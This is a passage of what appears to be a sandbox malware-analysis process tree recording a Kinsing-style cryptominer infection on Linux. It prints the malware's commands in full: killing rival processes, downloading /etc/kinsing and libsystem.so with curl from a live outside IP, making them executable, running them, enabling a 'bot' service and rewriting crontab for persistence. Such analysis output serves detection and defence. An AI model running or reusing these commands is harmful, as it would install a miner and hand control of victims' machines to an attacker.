                                                                                                                                                                                                                                                                                                                                                                        grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1851
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                          grep -v bin
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1850
                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                            awk "length(\$1) == 16"
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1849
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                              ps ax -o "command,pid" -www
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                              PID:1848
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                              grep -v proxymap
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1865
                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep -v postgres
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1866
                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                  grep -v postgrey
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1867
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                      PID:1869
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                      grep -v php-fpm
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1864
                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                        grep -v "("
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1863
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                          grep -v "\\["
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1862
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                            grep -v bin
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1861
                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                              awk "length(\$5) == 8"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1860
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                                                ps ax
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                PID:1859
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                PID:1874
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$2}"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1873
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                  grep /tmp/sscks
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1872
                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                    grep -v grep
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1871
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/ps
                                                                                                                                                                                                                                                                                                                                                                                                      ps aux
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1870
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                      chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1879
                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                        curl -o /etc/kinsing http://80.71.158.12/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                          chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2375
                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                            chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2380
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                              curl -o /etc/kinsing http://80.71.158.12/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2381
                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2383
                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                  chmod 777 /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                    curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2393
                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                      chmod +x /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2404
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                        chmod 777 /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2409
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/curl
                                                                                                                                                                                                                                                                                                                                                                                                                          curl -o /etc/libsystem.so http://80.71.158.12/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2410
                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                            chmod +x /etc/libsystem.so
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2433
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/rm
                                                                                                                                                                                                                                                                                                                                                                                                                              rm -rf /tmp/kdevtmpfsi
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2438
                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                chmod 777 /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2439
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                  chmod +x /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2440
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                    /etc/kinsing
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2441
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/id
                                                                                                                                                                                                                                                                                                                                                                                                                                      id -u
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2442
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                        systemctl enable bot
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads EFI boot settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2443
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                        systemctl start bot
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads EFI boot settings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2469
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2473
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2471
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                          sed /base64/d
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2472
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2487
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /_cron/d
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2486
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2485
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2490
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /31.210.20.181/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2489
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2488
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2497
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /update.sh/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2496
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2495
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2500
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /logo4/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2499
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2498
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2503
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /logo9/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2502
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2501
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2506
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /logo0/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /logo/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2507
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2509
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /tor2web/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2511
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2510
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /jpg/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2514
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /png/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2521
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /tmp/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /zmreplchkr/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2523
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2522
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /aliyun.one/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /3.215.110.66.one/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2529
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2533
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sed /pastebin/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        sed /onion/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2535
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2534
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2539
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            sed /lsd.systemten.org/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2538
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates/modifies Cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2542
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/sed
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                sed /shuf/d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2541
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  crontab -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    crontab -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates/modifies Cron job
